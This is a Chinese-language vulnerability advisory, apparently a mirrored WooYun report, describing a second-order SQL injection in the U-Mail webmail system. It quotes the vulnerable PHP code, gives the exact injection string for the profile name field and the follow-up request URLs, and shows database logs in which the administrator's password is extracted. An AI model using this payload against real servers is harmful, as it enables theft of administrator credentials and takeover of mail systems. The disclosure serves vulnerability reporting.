|U-Mail邮件系统二次注入（不鸡肋，可直接获取管理员密码）

U-Mail邮件系统二次注入（不鸡肋，可直接获取管理员密码）

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： U-Mail别哭。另外wooyun-2010-093049更新了无需登录且可批量getshell的exp，随便测试了下，批量轻轻松松get几百个shell，很严重，望管理速审核 :) ### 详细说明：漏洞文件 /client/oabshare/module/operates.php 代码 ``` if ( ACTION == "save-to-pab" ) { include_once( LIB_PATH."PAB.php" ); $PAB = PAB::getinstance( ); $maillist_id = gss( $_GET['maillist'] ); $maillist_id = intval( $maillist_id ); if ( $maillist_id ) { ...... } else { $domain_id = gss( $_GET['domain_id'] ); $user_ids = gss( $_GET['userlist'] ); $user_ids = id_list_filter( $user_ids );//WooYun-2014-74928 if ( !$user_ids ) { dump_msg( "param_error", "参数错误！" ); } $where = "t1.UserID IN (".$user_ids.")"; $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//首先是从数据库获取数据 $user_all = $arr_tmp['data']; if ( !$user_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $user_all as $user ) { $qq = $msn = ""; if ( strpos( $user['qqmsn'], "@" ) ) { $msn = $user['qqmsn']; } else { $qq = $user['qqmsn']; } if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $user['FullName'],//从数据库读取的字段内容 "pref_email" => $user['email'], "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'], "birthday" => $user['birthday'], "im_qq" => $qq, "im_msn" => $msn, "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 );//直接将读取的内容执行了add的操作 if ( !$res ) { dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误，添加失败！" ) ); } } } } dump_json( array( "status" => TRUE, "message" => "" ) ); } ``` 首先，需要引入二次注入的exp，引入文件如下 /client/option/module/o_userinfo.php ``` if ( ACTION == "userinfo" ) { $url = make_link( "option", "view", "userinfo" ); $where = "UserID='".$user_id."'"; $data = array( "FullName" => gss( $_POST['fullname'] ),//获得的数据存入数据库 "EnglishName" => gss( $_POST['englishname'] ) ); $result = $Mailbox->update_mailbox( $data, $where, 0 ); if ( !$result ) { redirect( $url, "修改姓名时出现错误，修改失败！" ); } ``` 将单引号等信息存入数据库，查看表结构，如下 [<img src="https://images.seebug.org/upload/201501/2216050334aefa1f4bce6a72ac91fbf155141a08.png" alt="a.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2216050334aefa1f4bce6a72ac91fbf155141a08.png) 长度为100足够读取敏感数据了首先登录用户，在修改个人资料处，中文名处填写 ',`homepage`=(SELECT password from userlist where userid=2)#如图 [<img src="https://images.seebug.org/upload/201501/221605335dac43dd0939df3a6b4afcf9b7b694ac.png" alt="b.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221605335dac43dd0939df3a6b4afcf9b7b694ac.png) 保存后，查看自己用户的userid，请求为 http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0006 如图 [<img src="https://images.seebug.org/upload/201501/2216060646e21096629f9f3c0ef760121f0b5964.png" alt="c.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2216060646e21096629f9f3c0ef760121f0b5964.png) 然后执行如下请求http://mail.fuck.com/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&domain_id=1&userlist=9 userlist为自己的userid，domain_id默认都为1执行完毕后，点击个人通讯录，如图 [<img src="https://images.seebug.org/upload/201501/22160642131c53001b92005624ad28bff7bb094d.png" alt="d.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22160642131c53001b92005624ad28bff7bb094d.png) 空白处，system帐号的密码如图 [<img src="https://images.seebug.org/upload/201501/22160718890932b6419ef64c5427f166f2ffb618.png" alt="e.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22160718890932b6419ef64c5427f166f2ffb618.png) [<img src="https://images.seebug.org/upload/201501/221607252c350ed1dba292c2552c8b4c84146c01.png" alt="f.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/221607252c350ed1dba292c2552c8b4c84146c01.png) 两步的sql执行情况如下 ``` 150122 15:54:44 2665 Connectumail@localhost on 2665 QuerySET NAMES 'UTF8' 2665 Init DBumail 2665 QueryUPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='9' 2665 QueryUPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='9' 2665 Quit ``` 以及 ``` 150122 15:57:16 2668 Connectumail@localhost on 2668 QuerySET NAMES 'UTF8' 2668 Init DBumail 2668 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 2668 QuerySELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.* FROM userlist as t1, mailuserinfo as t2 WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8) ORDER BY t1.OrderNo DESC,t1.Mailbox ASC 2668 QuerySELECT contact_id FROM pab_contact WHERE user_id='9' AND pref_email='test0005@fuck.com' LIMIT 1 2668 QueryINSERT INTO pab_contact SET `user_id`='9',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test0005@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-22 15:57:16' 2668 Quit ``` ### 漏洞证明：如上

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™